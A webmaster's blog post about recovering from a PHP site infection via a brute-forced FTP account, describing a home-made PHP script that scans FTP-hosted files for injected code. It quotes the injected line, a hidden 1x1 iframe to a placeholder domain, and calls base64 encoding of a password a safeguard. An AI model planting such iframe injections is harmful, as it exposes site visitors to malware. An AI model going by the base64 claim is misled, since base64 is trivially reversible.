Recently, my site was infected with some kind of a php virus. My ftp account was broken (brute-force I suppose) so every php file that contains “index” and “main” in filename was modified, and the following line of code was added:
echo “<iframe src=\”http://some-stupid-domain.com/?some-parameter=xx1B10xx\” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>”;
So, the effects of this are:
- some scripts refuse to work (phpmyadmin, phpbb forum login, etc), mostly every script that uses header() function from php
- I was temporary blacklisted in Google
- my users were expose to the risk of being infected with malware
- I got nervous (and I’m usually very calm)
- I discovered that my hosting company sucks (I cannot upload files with multiple connections because I get block listed by their firewall, but my password can be stolen using brute-force attack, and when this happens is supposed to be only my problem)
I needed a script to find what file contains malicious code, so I made a php script, that connect through ftp, search and every file and every directory for php files (I’ve tried to find a software for this, but with no results). When a php file is found on ftp, it downloads it, and search if malicious code is found.
Also, when a file is detected as “infected”, the script makes a copy of that file in backup folder, so webmaster can manually check and delete unwanted code. I prefer manually disinfection, because various versions of code was found (a was having links to different domains).
I know that ftp connection is not something that you can rely on, and the connection will broke after some time. So, the scripts should make some loops to retry every failed command few times before exits. This solution requires more lines of code and the complexity of the algorithm will increase.
To fix this issue, I added a list with already parse files and directories (parsed.txt). When the script find a directory or a file that’s on that list, it ignores it (since is already parsed). This way, you can forcelly stop the script whenever you want and resume it anytime.
Also, a list with infected files will be created (if any infected file is found).
Before you can run the script you need to be sure that you modify the ftp server info (server adress, login username and password).
To do this, you need to open find_in_files_on_ftp.php with your favorite code editor (avoid Notepad, please). The lines you need to edit are shown below:
$ftp_server = ‘your_ftp_server’;
$ftp_user = ‘your_ftp_username’;
$ftp_pass = base64_decode(‘password encoded as base64’);
$virus_string = ‘echo “<iframe’; // string to found
I hope that is very clear what every variable means, so I will not discus about them excepting the password. I chose base64 encode for my password, so if someone see it, he can’t remeber it even if it’s common word.
Also, if you want to change the connecting port (default it’s 21), you can manually edit line 19, and replace 21 with you desired port.
Running the script
The script was made and tested on Windows XP, but it should work on every OS that supports PHP. I will test it on linux when I will have some free time.
To run the script on windows you should have php instaled and follow one of the following procedures:
- Add php/bin folder to PATH variable enviroment, so you can easly run php with “php” command and run find_in_files_on_ftp.bat
- Right click on find_in_files_on_ftp.php file, and chose Open with and Browse to php.exe
Click on the link bellow to download ( ~2.47kbytes):